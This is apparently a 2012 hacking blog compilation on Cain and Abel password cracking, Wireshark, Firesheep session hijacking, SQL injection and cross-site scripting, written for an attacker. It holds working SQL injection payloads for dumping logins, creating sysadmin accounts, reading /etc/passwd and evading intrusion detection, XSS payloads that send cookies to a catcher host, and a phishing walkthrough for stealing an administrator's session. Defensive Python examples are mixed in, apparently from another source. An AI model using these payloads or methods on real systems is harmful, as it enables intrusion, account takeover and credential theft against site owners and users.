Friday, 17 February 2012

Cain and Abel Password Cracking Tool

Cain and Abel (often abbreviated to Cain) is a password recovery tool for Microsoft Windows. It can recover many kinds of passwords by sniffing network packets and by cracking various password hashes with dictionary, brute-force and cryptanalysis attacks. Cryptanalysis attacks are done via rainbow tables, which can be generated with the winrtgen.exe program provided with Cain and Abel.


Status with virus scanners

Some virus scanners detect Cain and Abel as 'malware'. Avast! detects it as "Win32:Cain-B [Tool]" and classifies it as "Other potentially dangerous program", while Microsoft Security Essentials detects it as "Win32/Cain!4_9_14" and classifies it as "Tool: This program has potentially unwanted behavior." Even if Cain's install directory, as well as the word "Cain", are added to Avast's exclude list, the real-time scanner has been known to stop Cain from functioning. However, the latest version of Avast no longer blocks Cain.

Features

* WEP cracking

* Speeding up packet capture speed by wireless packet injection

* Ability to record VoIP conversations

* Decoding scrambled passwords

* Calculating hashes

* Traceroute

* Revealing password boxes

* Uncovering cached passwords

* Dumping protected storage passwords

* ARP spoofing

* IP to MAC Address resolver

* Network Password Sniffer

* LSA secret dumper

* Ability to crack:


LM & NTLM hashes
NTLMv2 hashes
Microsoft Cache hashes
Microsoft Windows PWL files
Cisco IOS - MD5 hashes
Cisco PIX - MD5 hashes
APOP - MD5 hashes
CRAM-MD5 MD5 hashes
OSPF - MD5 hashes
RIPv2 MD5 hashes
VRRP - HMAC hashes
Virtual Network Computing (VNC) Triple DES
MD2 hashes
MD4 hashes
MD5 hashes
SHA-1 hashes
SHA-2 hashes
RIPEMD-160 hashes
Kerberos 5 hashes
RADIUS shared key hashes
IKE PSK hashes
MSSQL hashes
MySQL hashes
Oracle and SIP hashes


Configuration

Configure Cain and Abel Installation

Before you do anything with Cain and Abel, you're going to need to configure it. Be sure to install all the drivers and libraries that come with Cain and Abel.

With the Cain application open, select the Configure menu option on the main menu bar at the top of the application. The Configuration Dialog box will appear. From the list, select the device with the MAC address of the Ethernet or wireless network card that you will be using for hacking. Here is a description of each tab and its configuration:

Sniffer Tab

Allows the user to specify the Ethernet interface and the start up options for the sniffer and ARP features of the application.

ARP Tab

Allows the user, in effect, to lie to the network and tell all of the other hosts that your IP is actually that of a more important host on the network, like a server or router. This feature is useful in that you can impersonate the other device and have all traffic for that device "routed" to your workstation. Keep in mind that servers and routers are designed for multiple high-capacity connections. If the device that you are operating from cannot keep up with the traffic generated by this configuration, the target network will slow down and even come to a halt. This will surely lead to your detection and eventual demise as a hacker, as the event is easily detected and tracked with the right equipment.
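
On the defending side, the impersonation described above shows up as an IP address whose MAC binding changes, or as one MAC answering for several IPs including the gateway. The following is an added example, not part of the original post; the tuple format, function name and all addresses are constructed for illustration.

```python
"""Flag ARP cache poisoning indicators in a sequence of ARP replies."""
from collections import defaultdict

# Constructed observations (timestamp, sender IP, sender MAC), as they might
# be parsed from a capture. 10.0.0.1 is the gateway; from t=30 the host at
# 10.0.0.30 starts answering for the gateway and for 10.0.0.20.
SAMPLE_REPLIES = [
    (1.0, "10.0.0.1", "00:11:22:33:44:01"),
    (2.0, "10.0.0.20", "00:11:22:33:44:20"),
    (3.0, "10.0.0.30", "00:11:22:33:44:30"),
    (30.0, "10.0.0.1", "00:11:22:33:44:30"),
    (30.5, "10.0.0.20", "00:11:22:33:44:30"),
    (31.0, "10.0.0.1", "00:11:22:33:44:30"),
]


def detect_arp_anomalies(replies, max_ips_per_mac=1):
    """Return alerts for IP-to-MAC rebinding and for MACs claiming many IPs.

    The first MAC seen for an IP is treated as the baseline. Legitimate
    rebinds exist (DHCP reassignment, NIC replacement, failover pairs), so
    alerts are leads for triage, not proof of an attack.
    """
    baseline = {}                   # ip -> first MAC observed
    ips_by_mac = defaultdict(set)   # mac -> every IP it has answered for
    reported = set()                # (ip, mac) rebinds already alerted on
    alerts = []

    for ts, ip, mac in sorted(replies):
        mac = mac.lower()
        expected = baseline.setdefault(ip, mac)
        if mac != expected and (ip, mac) not in reported:
            reported.add((ip, mac))
            alerts.append({"type": "rebind", "time": ts, "ip": ip,
                           "expected_mac": expected, "seen_mac": mac})
        ips_by_mac[mac].add(ip)

    # A single MAC answering for more IPs than expected is the second signal.
    for mac, ips in sorted(ips_by_mac.items()):
        if len(ips) > max_ips_per_mac:
            alerts.append({"type": "multi_ip", "mac": mac, "ips": sorted(ips)})
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_anomalies(SAMPLE_REPLIES):
        print(alert)
```

Raise `max_ips_per_mac` on networks where routers or load balancers legitimately answer for several addresses.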

Filters and Ports

Most standard services on a network operate on predefined ports. These ports are defined under this tab. If you right-click on one of the services you will be able to change both the TCP and UDP ports. This will not be necessary for this tutorial, but will be useful in future tutorials.

HTTP Fields

Several features of the application such as the LSA Secrets dumper, HTTP Sniffer and ARP-HTTPS will parse the sniffed or stored information from web pages viewed. The more fields that you add to the HTTP and passwords field, the more likely you are to capture a relevant string from an HTTP or HTTPS transaction.

Traceroute

Traceroute is the ability to determine the path that your data will take from point A to point B. Cain adds some functionality to the GUI by allowing for hostname resolution, netmask resolution, and Whois information gathering. This feature is key in determining the proper or available devices to spoof or siphon on your LAN or internetwork.

Console

This is the command prompt on the remote machine. Anything that you can do on your PC from the CMD prompt can be done from here. Examples include mapping a drive back to your PC and copying all the files from the target, or adding local users to the local security groups, or anything really. With Windows, everything is possible from the command prompt.

Hashes

Allows for the enumeration of user accounts and their associated hashes with further ability to send all harvested information to the cracker.

LSA Secrets

Windows NT and Windows 2000 support cached logon accounts. The operating system default is to cache (store locally) the last 10 passwords. There are registry settings to turn this feature off or restrict the number of accounts cached. RAS DUN account names and passwords are stored in the registry. Service account passwords are stored in the registry. The password for the computer's secret account used to communicate in domain access is stored in the registry. FTP passwords are stored in the registry. All these secrets are stored in the following registry key: HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets.

Routes

From this object, you can determine all of the networks that this device is aware of. This can be powerful if the device is multihomed on two different networks.

TCP Table

A simple listing of all of the processes and ports that are running and their TCP session status.

UDP Table

A simple listing of all of the processes and ports that are running and their UDP session status.




Dictionary Cracking

Select all of the hashes and select Dictionary Attack (LM). You could select the NTLM, but the process is slower and, with few exceptions, the NTLM and NT passwords are the same and NT cracks (guesses) faster. In the Dictionary window, you will need to populate the File window with each of your dictionary files. You have to download the tables and copy them to the Cain installation directory. Check the following boxes: As Is Password, Reverse, Lowercase, Uppercase, and Two Numbers.

Dictionary Cracking process

Click start and watch Cain work. The more lists and words that you have, the longer it will take. When Cain is finished, click exit and then look at the NT password column. All of the passwords cracked will show up next to the now owned accounts. Take a second to look carefully at the accounts and passwords in the list. Look for patterns like the use of letters and characters in sequence. Many administrators use reoccurring patterns to help users remember their passwords. Example: Ramius password reset in November would have a user account of RAMNOV. If you can identify patterns like this you can use word generators to create all possible combinations and shorten the window.

Cryptanalysis attacking

Re-sort your hashes to single out the accounts that you have left to crack. Now select all of the uncracked or guessed accounts, right-click on the accounts again and select Cryptanalysis (LM). Add the tables that you downloaded from the net to the Cain LM hashes Cryptanalysis Sorted rainbow tables window. Click start. This should go pretty quickly. Take a second to review your progress and look for additional patterns.

At this point, use a program like sam grab, which has the ability to determine which accounts are members of the domain administrators group, to see if you have gotten any admin-level accounts. Once you move to the next step, which is bruting, most of what you have left are long passwords that are going to be difficult and time-consuming. Any time-saver applications that you can find will be helpful.

Brute Force attack

Repeat the same process for selecting the accounts. Look closely at all of the passwords that you have cracked and look for patterns. First, do you see any special characters in any of the passwords cracked? How about numbers? A lot of all upper case or all lower case? Use what you see to help you determine what parameters to include when you are bruting. As you will see, the addition of a single character or symbol can take you from hours to days or even years to crack a password. The goal is to use the least amount of characters and symbols to get the account that you need. So let's finish it off. Select all of the uncracked accounts, follow the previous steps and select Brute Force (LM). The default for LM is A-Z and 0-9. Based on the other passwords and those accounts with an "*" in the 8 field, decide how many characters to specify in the password length pull-down box. Make your selection and have at it. 123749997 years to completion? If you see this, then you should rethink the need for this account. Working with the application, rainbow tables and password generators can help you narrow down to reasonable time frames to get the job done.


Password cracking using Cain and Abel

- Install Cain and Abel using the default settings

- Start Cain and Abel

- Click on the Cracker tab

- Click somewhere inside the table

- Click on File, Add to list

- Select Import hashes from local system and click next

- Right click on the account you want the password for and select Brute-force attack

- Choose the option you want to use (for Windows passwords either LM hashes or NTLM hashes)

- Select the character set you want to use, set the minimum and/or maximum password length if you know it to decrease the amount of cracking time needed

- Click on Start and wait

Download Cain and Abel for Windows NT/2000/XP/Vista/7 here

Thursday, 16 February 2012

Wireshark - Packet Analyzer

Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education.



Wireshark is cross-platform, using the GTK+ widget toolkit to implement its user interface, and using pcap to capture packets. It runs on various Unix-like operating systems including Linux, Mac OS X, BSD, and Solaris, and on Microsoft Windows. There is also a terminal-based (non-GUI) version called TShark. Wireshark, and the other programs distributed with it such as TShark, are free software, released under the terms of the GNU General Public License.

Download Wireshark for Windows 32-bit here and Windows 64-bit here


Features

Wireshark is software that "understands" the structure of different networking protocols. It is able to display the encapsulation and the fields along with their meanings of different packets specified by different networking protocols. Wireshark uses pcap to capture packets, so it can only capture the packets on the types of networks that pcap supports.

- Data can be captured "from the wire" from a live network connection or read from a file that recorded already-captured packets.

- Live data can be read from a number of types of network, including Ethernet, IEEE 802.11, PPP, and loopback.

- Captured network data can be browsed via a GUI, or via the terminal (command line) version of the utility, TShark.

- Captured files can be programmatically edited or converted via command-line switches to the "editcap" program.

- Data display can be refined using a display filter.

- Plug-ins can be created for dissecting new protocols.

- VoIP calls in the captured traffic can be detected. If encoded in a compatible encoding, the media flow can even be played.

- Raw USB traffic can be captured with Wireshark. This feature is currently available only under Linux.

Wireshark's native network trace file format is the libpcap format supported by libpcap and WinPcap, so it can read capture files from applications such as tcpdump and CA NetMaster that use that format, and its captures can be read by applications that use libpcap or WinPcap to read capture files. It can also read captures from other network analyzers, such as snoop, Network General's Sniffer, and Microsoft Network Monitor.


Package install

There is no Wireshark package for Ubuntu releases before Edgy (6.10), and no stable Wireshark package for Debian either. In these cases you need to download an Ethereal package or compile Wireshark from source.

Ubuntu releases before Edgy (6.10) - #apt-get install ethereal

Ubuntu releases starting from Edgy (6.10) - #apt-get install wireshark

To launch Wireshark under Ubuntu - #wireshark


Wireshark GUI - Capture Filters

The capture filter syntax is the same as the one used by programs using the libpcap (Linux) or WinPcap (Windows) library, like the famous tcpdump. The capture filter must be set before launching the Wireshark capture, which is not the case for display filters, which can be modified at any time during the capture. The steps to configure a capture filter are the following:

- Select Capture - Options.

- Fill the "capture filter" field or click on the "capture filter" button to give a name to your filter to reuse it for subsequent captures.

- Click on Start to capture data.

The result will show you the source and destination IP address, protocol and info.


Wireshark GUI - Capture Data Packets

- From the Wireshark menubar choose Capture - Interfaces. Next choose the interface (network interface card or NIC). Or choose Capture - Options and choose the interface.

  IMPORTANT: Turn promiscuous mode off if you don't want a network administrator to see you running in that mode.

- Create a capture filter to prevent Wireshark from capturing all network traffic going through the interface. In the text field next to the "Capture Filter" button, type host [ip_address], substituting the IP address you care about for the [ip_address] part. This will create a filter that passes only traffic either originating from or going to the specified host.

- You can also choose the option Capture - Capture Filters. Choose the specific filter and click OK.

- Now you can press Start. Wireshark is now capturing any data involving the specified IP address, whether as a source or as a destination, or capturing all data involving the specified interface.

- With the option Go you can choose to view a specific packet. Just type the number of the packet in the text field and choose Jump to. You can also double-click on a specific packet to view the data. Another window will pop up with the data of the specific packet.

- For example, go to Analyze - Follow TCP Stream. You should see the TCP stream content.




Syntax examples

tcp dst port 3128 - Displays packets with destination TCP port 3128.

ip src host 10.1.1.1 - Displays packets with source IP address equal to 10.1.1.1.

host 10.1.2.3 - Displays packets with source or destination IP address equal to 10.1.2.3.

src portrange 2000-2500 - Displays packets with source UDP or TCP ports in the 2000-2500 range.

not icmp - Displays everything except ICMP packets (ICMP is typically used by the Ping tool).

src host 10.7.2.12 and not dst net 10.200.0.0/16 - Displays packets with source IP address equal to 10.7.2.12 and, at the same time, a destination outside the IP network 10.200.0.0/16.


Menu

The eight menus at the top of the platform are used to configure Wireshark.

File - Opens or saves a capture

Edit - Finds or marks packets

View - Configures the Wireshark platform view

Go - Reach data inside the capture

Capture - Sets capture filters options and starts the capture

Analyze - Sets Analyze options

Statistics - Views Wireshark statistics

Help - Finds local or online support


Display Filter

The display filter is used to search inside captured data obtained with a capture filter. Its search capabilities are more extended than those of the capture filter and it is not necessary to restart the capture when you need to change your filter.

Syntax Examples

snmp || dns || icmp - Displays SNMP, DNS or ICMP traffic.

ip.addr == 10.1.1.1 - Displays packets with source or destination IP address equal to 10.1.1.1.

tcp.port == 25 - Displays packets with TCP source or destination port 25.

tcp.dstport == 25 - Displays packets with TCP destination port 25.


Packet List Pane

The packet list pane displays all the captured packets. You can get information such as the source or destination MAC/IP addresses, the TCP/UDP ports number, the protocol or the packet content. If an OSI layer 2 packet is captured you will see MAC addresses in the source and destination columns and, of course, nothing in the port column. If an OSI layer 3 or upper packet is captured you will see IP addresses in the source and destination columns. The port column is populated only if the packet is at the layer 4 or upper.
You can add/remove columns or change some colors in the pane as follows: Edit menu - Preferences.


Packet Details Pane

The packet details pane gives in depth information about a packet selected in the packet list pane. The information is displayed per OSI layer and can be expanded and collapsed.


Dissector Pane

The dissector pane, also called "packet bytes pane" by Wireshark, displays the same information as the packet details pane, but in hexadecimal style.


Miscellaneous

At the bottom of the platform you can find the following information:

- The network card used for the capture.

- If the capture is running or stopped.

- Where the capture is stored on the hard drive.

- The capture size.

- The number of captured packets. (P)

- The number of displayed packets. (D) (Packets matching the display filter)

- The number of marked packets. (M)

Hijack websessions with Firesheep

Firesheep is a Firefox extension used to hijack web sessions, usually over WiFi networks. Firesheep doesn't steal usernames and passwords. Instead it copies session cookies used on websites that require authentication. These are then used to impersonate the hijacked connection.

When logging into a website you usually start by submitting your username and password. The server then checks to see if an account matching this information exists and if so, replies back to you with a "cookie" which is used by your browser for all subsequent requests.

It's extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else. This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called "sidejacking") is when an attacker gets a hold of a user's cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy.
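
The site-side fix for the exposure described above is to serve the whole session over HTTPS and mark the session cookie `Secure`, so the browser never sends it in cleartext; `HttpOnly` additionally keeps it away from page scripts. The following is an added example, not part of the original post, that audits `Set-Cookie` headers for those two flags; the cookie names, values and name hints are constructed assumptions.

```python
"""Audit Set-Cookie headers for the flags that blunt cookie sidejacking."""

# Constructed response headers for illustration; names and values are made up.
SAMPLE_HEADERS = [
    "Set-Cookie: sessionid=3f9a1c; Path=/",
    "Set-Cookie: auth=77be02; Path=/; Secure",
    "Set-Cookie: sid=a81d4e; Path=/; Secure; HttpOnly; SameSite=Lax",
    "Set-Cookie: theme=dark; Path=/",
]

# Assumption: session-bearing cookies are recognised by substrings of the name.
SESSION_HINTS = ("sess", "sid", "auth", "token")

# Why each flag matters for a session cookie.
REQUIRED_FLAGS = {
    "secure": "cookie is sent over plain HTTP and can be read off the air",
    "httponly": "cookie is readable by page script via document.cookie",
}


def parse_set_cookie(header_line):
    """Split one Set-Cookie header into (name, value, attributes)."""
    _, _, raw = header_line.partition(":")
    parts = [p.strip() for p in raw.split(";") if p.strip()]
    if not parts:
        return None
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        # Valueless attributes (Secure, HttpOnly) are stored as True.
        attrs[key.strip().lower()] = val.strip() or True
    return name.strip(), value, attrs


def audit_cookies(header_lines, session_hints=SESSION_HINTS):
    """Return [(cookie_name, [missing_flag, ...])] for session cookies."""
    findings = []
    for line in header_lines:
        if not line.lower().startswith("set-cookie:"):
            continue
        parsed = parse_set_cookie(line)
        if parsed is None:
            continue
        name, _value, attrs = parsed
        if not any(hint in name.lower() for hint in session_hints):
            continue  # preference cookies such as "theme" are out of scope
        missing = [flag for flag in REQUIRED_FLAGS if flag not in attrs]
        if missing:
            findings.append((name, missing))
    return findings


if __name__ == "__main__":
    for name, missing in audit_cookies(SAMPLE_HEADERS):
        for flag in missing:
            print(f"{name}: missing {flag}: {REQUIRED_FLAGS[flag]}")
```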

Facebook is constantly rolling out new "privacy" features in an endless attempt to quell the screams of unhappy users, but what's the point when someone can just take over an account entirely?

After installing the extension you'll see a new sidebar. Connect to any busy open wifi network and click the big "Start Capturing" button. Then wait.

As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed.

Double-click on someone, and you're instantly logged in as them.


Firesheep is free (open source) and is available now for Mac OS X and Windows. Linux support is on the way. Download Firesheep here

SQL Injection

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.


SQL Injection

SQL Injection is one of the most common web attacks. You attack the web application (ASP, JSP, PHP, CGI) rather than the web server or the services running on the OS. SQL Injection is a way to trick the application by submitting a query or command as input via web pages. Most websites take parameters from the user, like a username and password or even their email. They all use SQL queries.

You should start with something simple:

Login:' or 1=1--
Pass:' or 1=1--
http://website/index.asp?id=' or 1=1--
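
Why the `' or 1=1--` string above works, and what stops it: the following is an added example, not part of the original post, that runs a string-built query beside a parameterized one against an in-memory SQLite database. The table, column and function names and the sample rows are constructed for illustration.

```python
"""String-built SQL versus a parameterized query, using in-memory SQLite."""
import re
import sqlite3

PAYLOAD = "' or 1=1--"   # the test string quoted in the text above


def make_db():
    """Create a constructed users table with three rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT PRIMARY KEY, email TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", [
        ("alice", "alice@example.test"),
        ("bob", "bob@example.test"),
        ("carol", "carol@example.test"),
    ])
    return db


def lookup_vulnerable(db, login):
    # Input is pasted into the statement text, so a quote in the input ends
    # the string literal and the rest is parsed as SQL.
    query = "SELECT login, email FROM users WHERE login = '" + login + "'"
    return db.execute(query).fetchall()


def lookup_parameterized(db, login):
    # The statement text is fixed; the driver binds the input as a value,
    # so it is only ever compared against the login column.
    return db.execute(
        "SELECT login, email FROM users WHERE login = ?", (login,)
    ).fetchall()


LOGIN_RE = re.compile(r"[a-z0-9_]{1,32}")


def lookup_validated(db, login):
    # Strong typing of input as a second layer: reject anything that is not
    # a plausible login before it reaches the database at all.
    if not LOGIN_RE.fullmatch(login):
        raise ValueError("login contains characters outside the allow-list")
    return lookup_parameterized(db, login)


if __name__ == "__main__":
    db = make_db()
    print("string-built :", lookup_vulnerable(db, PAYLOAD))     # every row
    print("parameterized:", lookup_parameterized(db, PAYLOAD))  # no rows
    print("normal lookup:", lookup_parameterized(db, "alice"))
```

The same binding mechanism exists in every mainstream database driver; the allow-list is an extra layer, not a substitute for it.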

These are simple ways to try other queries:

' having 1=1--
' group by userid having 1=1--
' union select sum(columnname) from tablename--


Gathering Information:

' or 1 in (select @@version)--
' union all select @@version--

Those will find the actual version of the computer, OS/service pack.

Data types:

Oracle

-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_VIEWS
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB

MySQL

-->mysql.user
-->mysql.host
-->mysql.db

MS access

-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships

MS SQL Server

-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases


Grabbing passwords:

'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --

' and 1 in (select var from temp)--

' ; drop table temp --


Create DB accounts:

MS SQL

exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'

MySQL

INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))

Access

CREATE USER name IDENTIFIED BY 'pass123'

Postgres (requires Unix account)

CREATE USER name WITH PASSWORD 'pass123'

Oracle

CREATE USER name IDENTIFIED BY pass123
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;


MySQL OS Interaction

' union select 1,load_file('/etc/passwd'),1,1,1;


Server name and config:

' and 1 in (select @@servername)--
' and 1 in (select servername from master.sysservers)--


Retrieving VNC password from registry:

'; declare @out binary(8)
exec master..xp_regread
@rootkey = 'HKEY_LOCAL_MACHINE',
@key = 'SOFTWARE\ORL\WinVNC3\Default'
@value_name='password'
@value = @out output
select cast (@out as bigint) as x into TEMP--
' and 1 in (select cast(x as varchar) from temp)--


IDS Signature Evasion:

Evading ' OR 1=1 Signature

' OR 'unusual' = 'unusual'
' OR 'something' = 'some'+'thing
' ' OR 'text' = N'text'
' OR 'something' like 'some%'
' OR 2 > 1
' OR 'text' > 't'
' OR 'whatever' in ('whatever')
' OR 2 BETWEEN 1 and 3


MySQL Input Validation Circumvention using Char():

Inject without quotes (string = "%"):
--> ' or username like char(37);
Inject with quotes (string="root"):
--> ' union select * from users where login = char(114,111,111,116);
load files in unions (string = "/etc/passwd"):
-->' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Check for existing files (string = "n.ext"):
-->' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));


IDS Signature Evasion using comments:

-->'/**/OR/**/1/**/=/**/1
-->Username:' or 1/*
-->Password:*/=1--
-->UNI/**/ON SEL/**/ECT
-->(Oracle) '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
-->(MS SQL) '; EXEC ('SEL' + 'ECT US' + 'ER')


Strings without quotes

--> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)




SQL Exploit Scanner

Download SQL Poizon v 1.1 Exploit Scanner here


Select engine. For example Google API or Proxify Search.

Select country. For example United States or United Kingdom.

Select dorks. For example PHP or SQL.

And scan for vulnerable websites.

XSS Attack - Cross Site Scripting

Cross-Site Scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client side script into web pages viewed by other users. An exploited cross site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigations implemented by the site's owner.


Cross Site Scripting

Cross Site scripting holes are web-application vulnerabilities which allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page-content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection.

Non-persistent

Non-persistent XSS vulnerabilities in Google could allow malicious sites to attack Google users who visit them while logged in. The non-persistent (or reflected) cross-site scripting vulnerability is by far the most common type. These holes show up when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user, without properly sanitizing the request.

Because HTML documents have a flat, serial structure that mixes control statements, formatting, and the actual content, any non-validated user-supplied data included in the resulting page without proper HTML encoding, may lead to markup injection. A classic example of a potential vector is a site search engine: if one searches for a string, the search string will typically be redisplayed verbatim on the result page to indicate what was searched for. If this response does not properly escape or reject HTML control characters, a cross-site scripting flaw will ensue.
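
The site-search case described above, with the missing step put back in: the following is an added example, not part of the original post, that renders the same search term without and with HTML output encoding. The function names, page markup and header values are constructed for illustration.

```python
"""Reflected search term rendered without and with HTML output encoding."""
import html
from urllib.parse import parse_qs

# Response headers a hardened handler would also send (defence in depth):
# the CSP blocks inline script even if an encoding bug slips through, and
# HttpOnly keeps the session cookie out of reach of document.cookie.
HARDENED_HEADERS = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Content-Security-Policy", "default-src 'self'"),
    ("Set-Cookie", "sid=constructed-value; Path=/; Secure; HttpOnly"),
]

# Constructed query strings: a script-tag probe and an attribute break-out
# probe that only carries a harmless <b> tag.
SCRIPT_PROBE = "q=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E"
ATTR_PROBE = "q=%22%3E%3Cb%3Ex%3C%2Fb%3E"


def _search_term(query_string):
    """Return the URL-decoded value of the q parameter ('' if absent)."""
    return parse_qs(query_string, keep_blank_values=True).get("q", [""])[0]


def render_vulnerable(query_string):
    # The term is echoed verbatim into an attribute and into element text,
    # so any markup it contains becomes part of the page.
    term = _search_term(query_string)
    return ('<form><input name="q" value="' + term + '"></form>'
            "<p>Results for " + term + "</p>")


def render_encoded(query_string):
    # html.escape turns &, <, > and (with quote=True) both quote characters
    # into entities, so the term is displayed as text in either context.
    term = html.escape(_search_term(query_string), quote=True)
    return ('<form><input name="q" value="' + term + '"></form>'
            "<p>Results for " + term + "</p>")


if __name__ == "__main__":
    for label, qs in (("script", SCRIPT_PROBE), ("attribute", ATTR_PROBE)):
        print(label, "raw    :", render_vulnerable(qs))
        print(label, "encoded:", render_encoded(qs))
```

Encoding must match the output context: `html.escape` covers element text and quoted attributes, not values placed inside script blocks or URLs.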

At first blush, this does not appear to be a serious problem: by submitting a malicious input to the web site, the user would only be able to compromise their own security context—that is, their own browser cookies, cache objects, and so forth. It is important to realize, however, that a third-party attacker may easily place hidden frames or deceptive links on unrelated sites and cause victims' browsers to navigate to URLs on the vulnerable site automatically—often completely in the background—and in such a case, the attacker can intrude into the security context that rightfully belonged to the victim.

In this method you will make the victim admin go to your link. First you will pick an XSS-vulnerable website. For this method you will need a search.php page that is vulnerable to XSS and has cookies in that page. In the vulnerable search.php, in the textbox for the word to search for, type:

Code:

(script)alert(document.cookie)(/script)

NOTE: You have to change the () of the script tag into <> to execute the code. Just use the HTML code for the script tag.

Click the search button. If you see a JavaScript popup, it means it's vulnerable to a non-persistent XSS attack. Now you will do something similar.

Code:

(script)document.location="www.examplecom/cookie catcher.php?c=" + document.cookie(/script)

NOTE: You have to change the () of the script tag into <> to execute the code. Just use the HTML code for the script tag.


Now go to http://www.tinyurl.com and shrink the whole page's link. Try to find a site administrator's e-mail in that vulnerable website and send a fake mail from an online fake mailer. Now in the body just tell something fake like: "I found a bug in your website!" And give him the shortened link of the search.php which you added the code in front of. So the Tinyurl will mask it and once he goes to the link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. No matter what he does or changes his password you can still login as him.


Persistent

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read.

Persistent XSS can be more significant than other types because an attacker's malicious script is rendered automatically, without the need to individually target victims or lure them to a third-party website. Particularly in the case of social networking sites, the code would be further designed to self-propagate across accounts, creating a type of a client-side worm.

The methods of injection can vary a great deal; in some cases, the attacker may not even need to directly interact with the web functionality itself to exploit such a hole. Any data received by the web application that can be controlled by an attacker could become an injection vector.

Code:

(iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="www.examplecom/cookie catcher.php?c=" + document.cookie)(/iframe)

NOTE: You have to change the () of the iframe tag into <> to execute the code. Just use the HTML code for the iframe tag.

Then post it in the forum or the comment box. Now this will open an iframe in the page which will allow you to have the same page in that website. If you don't know about iframes, make a new HTML file on your computer and just do a (iframe src="www.google.com")(/iframe) and you will understand iframes more.

NOTE: The site needs to have cookies supported! A blank javascript means you need to go to another site.




Exploit scenarios

Attackers intending to exploit cross-site scripting vulnerabilities must approach each class of vulnerability differently. For each class, a specific attack vector is described here. The names below are technical terms, taken from the cast of characters commonly used in computer security.

Non-persistent:

- Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and stores sensitive data, such as billing information.

- Mallory observes that Bob's website contains a reflected XSS vulnerability.

- Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, enticing her to click on a link for the URL under false pretenses. This URL will point to Bob's website, but will contain Mallory's malicious code, which the website will reflect.

- Alice visits the URL provided by Mallory while logged into Bob's website.

- The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server (this is the actual XSS vulnerability). The script can be used to send Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc.) without Alice's knowledge.


Persistent attack:

- Mallory posts a message with malicious payload to a social network.

- When Bob reads the message, Mallory's XSS steals Bob's cookie.

- Mallory can now hijack Bob's session and impersonate Bob.


Framework:

A Browser Exploitation Framework could be used to attack the web site and the user's local environment.


Related vulnerabilities

Several classes of vulnerabilities or attack techniques are related to XSS: cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege. HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting).

Cross-site request forgery (CSRF/XSRF) is almost the opposite of XSS, in that rather than exploiting the user's trust in a site, the attacker (and his malicious page) exploits the site's trust in the client software, submitting requests that the site believes represent conscious and intentional actions of authenticated users.

SQL injection exploits a vulnerability in the database layer of an application. When user input is incorrectly filtered, any SQL statements can be executed by the application.


XSS (Cross Site Scripting) Examples

NOTE: You have to change all the () in the codes into <> to execute the code. Just use the HTML code for the tags.

XSS locator

If you don't have much space and know there is no vulnerable JavaScript on the page, this string is a compact XSS injection check. View source after injecting it and look for XSS versus <XSS to see if it is vulnerable:

'';!--"=&{()}

Image XSS using the JavaScript directive (IE7.0 doesn't support the JavaScript directive in the context of an image, but it does in other contexts; the following shows the principles that would work in other tags as well):

